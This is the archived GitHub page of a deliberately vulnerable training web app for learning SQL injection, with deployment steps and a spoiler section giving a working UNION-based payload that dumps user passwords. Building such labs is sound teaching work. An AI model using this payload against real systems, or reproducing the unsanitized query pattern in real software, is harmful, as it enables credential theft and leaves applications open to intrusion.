Skip to content
This repository was archived by the owner on May 26, 2023. It is now read-only.

lucas-santoni/sqli-platform

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
_database
_database
 
 
_public
_public
 
 
srcs
srcs
 
 
.gitignore
.gitignore
 
 
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
docker-compose.yml
docker-compose.yml
 
 
package.json
package.json
 
 
screenshot.png
screenshot.png
 
 
yarn.lock
yarn.lock
 
 

Repository files navigation

SQLi Platform

This is a vulnerable WEB application in order to understand SQL injections basics.

The front end exposes a field allowing the user to search a database and retrieve names, nicknames, mails... The user's inputs are not sanitized, allowing an attacker to inject SQL code and leak passwords.

SQL queries are logged on the backend and are also shown on the front, so that the attacker has a better understanding of what he is doing.

Screenshot

Deploy

You may run the application under Docker containers:

docker-compose up

You way edit docker-compose.yml in order to tweak the following settings :

  • MYSQL_ROOT_PASSWORD Databse password
  • SQL_HOST Database host, from the API point of view
  • SQL_WAIT API waiting for that time (in seconds) before connecting to the database

The application is then accessible on http://localhost:8080/.

Exploit

⚠️ Contains spoilers !
Here is an example of a working payload, exposing all passwords in the table:

nothing%" UNION SELECT pass, nickname, email FROM users#

Resulting in the following complete query:

SELECT id, nickname, email FROM users WHERE nickname LIKE "%nothing%" UNION SELECT pass, nickname, email FROM users#%"

About

Training for SQL injections

Resources

Readme
Activity

Stars

36 stars

Watchers

1 watching

Forks

9 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages